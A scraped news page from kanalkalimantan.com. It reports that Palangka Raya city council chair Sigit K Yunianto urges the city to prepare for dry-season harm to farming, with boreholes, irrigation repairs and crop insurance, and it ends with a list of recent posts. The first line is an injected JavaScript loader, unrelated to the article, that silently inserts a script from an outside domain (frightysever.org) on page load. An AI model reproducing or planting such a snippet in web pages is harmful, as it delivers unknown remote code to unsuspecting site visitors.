(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD Kota Palangka Raya

Ketua DPRD Kota Palangka Raya Dorong Antisipasi Dampak Musim Kemarau terhadap Produksi Pangan


KANALKALIMANTAN.COM,PALANGKARAYA- Ketua Dewan Perwakilan Rakyat Daerah (DPRD) Kota Palangka Raya, Kalimantan Tengah, Sigit K Yunianto, ajukan permintaan kepada pemerintah kota setempat untuk segera mengambil langkah antisipasi terhadap dampak musim kemarau terhadap produksi pangan di daerah tersebut.

“Selain masalah karhutla, kita juga harus memperhatikan nasib petani, termasuk dampak menurunnya produksi akibat musim kemarau,” kata Sigit.

Sigit mengungkapkan Pemerintah Kota Palangka Raya, melalui sektor yang mengoordinasi, harus serius mempertimbangkan langkah-langkah antisipasi terhadap gangguan dalam produksi pangan yang mungkin timbul akibat musim kemarau. Salah satu dampak yang harus diperhatikan adalah kekeringan yang dapat menyebabkan gagal panen.

“Kami melihat ini sebagai isu yang harus mendapatkan perhatian serius dalam menghadapi musim kemarau. Perlu ada tindakan untuk mengantisipasi dampak dari kekeringan, terutama di lahan-lahan pertanian, agar produksi pertanian tetap terjaga,” katanya.

Sigit menjelaskan bahwa salah satu langkah yang dapat diambil oleh pemerintah kota untuk mengatasi kekeringan adalah menyediakan sumur bor atau meningkatkan sistem saluran air, termasuk sistem primer, skunder, dan tersier. Hal ini penting karena kondisi saluran air dapat berdampak langsung pada pasokan air ke lahan pertanian masyarakat.

“Banyak tindakan yang dapat membantu petani dalam menghadapi situasi terburuk saat musim kemarau tiba, dan ini juga untuk kesejahteraan masyarakat,” tambahnya.

Sigit menekankan bahwa menghadapi musim kemarau memerlukan tindakan konkret untuk menghindari penurunan produksi pangan, yang juga dapat berdampak pada kenaikan harga komoditas.

“Jika ada kegagalan dalam panen, itu akan memengaruhi ketersediaan pangan di pasaran dan juga akan memengaruhi harga pangan itu sendiri,” ujarnya.

Sigit berharap bahwa pemerintah kota dapat segera mengambil langkah-langkah antisipasi terhadap kemungkinan kekeringan di lahan pertanian akibat musim kemarau, dan juga mempertimbangkan opsi seperti asuransi untuk petani sebagai upaya mengurangi beban petani jika terjadi kegagalan panen.(www.kanalkalimantan.com/hms)


Muhammad Andi

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

3 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

3 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

4 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

5 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

6 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

6 jam ago

This website uses cookies.